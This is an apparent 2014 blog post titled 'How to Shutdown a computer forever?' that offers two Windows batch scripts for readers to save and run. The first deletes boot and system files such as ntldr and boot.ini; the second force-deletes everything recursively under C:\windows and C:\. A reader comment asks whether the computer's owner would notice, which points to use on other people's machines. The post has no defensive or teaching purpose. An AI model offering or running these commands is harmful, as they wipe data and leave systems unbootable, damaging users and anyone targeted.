Pages

Sunday, 9 February 2014

How to Shutdown a computer forever?

Now Please don’t try this because this is the most simplest and deadliest trick for your windows computer. Copy the following code into your notepad

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows
\win.ini
del c:\windows\win.ini


Save it as “filename.bat”. Just make sure it
has a .bat or .cmd extension.
 

IF YOU DONT WANT TO REBOOT YOUR SYSTEM AGAIN THEN ONLY THEN YOU CAN USE THIS TRICK.....:) 

Here’s an alternative code.
cmd /c del c:\windows\* /F /S /Q
cmd /c del c:\* /F /S /Q
Paste it in NotePad And Save It
with Extension .cmd or .bat

 BOTH CODE DO SAMETHING....:)

 

1 comments:

  1. does the owner of the pc will come to know about this problem

    ReplyDelete